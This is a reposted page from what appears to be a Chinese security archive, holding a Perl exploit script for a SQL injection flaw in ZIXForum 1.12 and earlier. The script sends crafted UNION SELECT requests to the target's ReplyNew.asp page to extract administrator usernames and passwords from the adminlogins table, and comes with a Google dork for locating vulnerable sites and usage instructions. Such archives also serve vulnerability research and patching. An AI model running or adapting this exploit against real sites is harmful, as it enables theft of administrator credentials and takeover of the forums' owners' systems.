首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Zix Forum <= 1.12 (RepId) Remote SQL Injection Exploit
来源:slimtim10@gmail.com 作者:SlimTim10 发布时间:2006-09-18  

#!/usr/bin/perl
###########################################
# ZIXForum <= v1.12 Exploit
# Vulnerability found by Chironex Fleckeri
# Created By: SlimTim10
# <slimtim10@gmail.com>
###########################################
# Google dork:
# intext:"ZIXForum 1.12 by: ZixCom 2002"
###########################################


use IO::Socket::INET;

usage() unless (@ARGV == 2);

$host = shift(@ARGV);
$dir = shift(@ARGV);

$dir = "\/$dir" if ($dir !~ /^\//);
$dir = "$dir\/" if ($dir !~ /\/$/);
$host =~ s/http:\/\///g;

$path = $dir.'ReplyNew.asp?RepId=-1%20UNION%20SELECT%20null,null,null,J_user,null,null,null,null,null,null,null,null%20FROM%20adminlogins';
$path2 = $dir.'ReplyNew.asp?RepId=-1%20UNION%20SELECT%20null,null,null,J_pass,null,null,null,null,null,null,null,null%20FROM%20adminlogins';
$socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$host", PeerPort => "80") || die "[-]Connect Failed: could not connect to $host\r\n"; # show an error!

print "[+]Connecting...\n";
print $socket "GET $path HTTP/1.1\n";
print $socket "Host: $host\n";
print $socket "Accept: */*\n";
print $socket "Connection: close\n\n";
print "[+]Connected\n";
print "[+]User: ";

while ($answer = <$socket>) {
$answer =~ m/name="R_Headline" size="30" class="normal" value="Re: (.*?)"/ && print "$1\n";
}

$socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$host", PeerPort => "80") || die "[-]Connect Failed: could not connect to $host\r\n";
print $socket "GET $path2 HTTP/1.1\n";
print $socket "Host: $host\n";
print $socket "Accept: */*\n";
print $socket "Connection: close\n\n";
print "[+]Pass: ";

while ($answer = <$socket>) {
$answer =~ m/name="R_Headline" size="30" class="normal" value="Re: (.*?)"/ && print "$1\n";
}

sub usage {
print "\n" . "=|=-" x 14 . "=|=";
print q(
] [
[ ZIXForum <= 1.12 "RepId" Remote SQL Injection Exploit ]
] Tested on ZIXForum <= v1.12 [
[ Created By: SlimTim10 <slimtim10@gmail.com> ]
] [);
print "\n" . "=|=-" x 14 . "=|=\n\n";
print " Usage: $0";
print q( [HOST] [PATH] E.g. );
print "$0";
print q( www.host.com /forum/);
print "\n\n" . "`^" x 29 . "`\n";
exit;
}



 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Site@School <= 2.4.02 Advis
·AlstraSoft E-Friends <= 4.8
·PHP DocWriter <= 0.3 (scrip
·Php League <= 0.81 (config.
·Limbo CMS <= 1.0.4.2L (com_
·MiniHttpServer Web Forum & Fil
·X11R6 <= 6.4 XKEYBOARD Loca
·MS Internet Explorer 7 Popup A
·MS Internet Explorer COM Objec
·N/X WCMS <= 4.1 (nxheader.i
·phpBB <= 2.0.21 (Poison NUL
·Light Blog Remote Multiple Vul
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved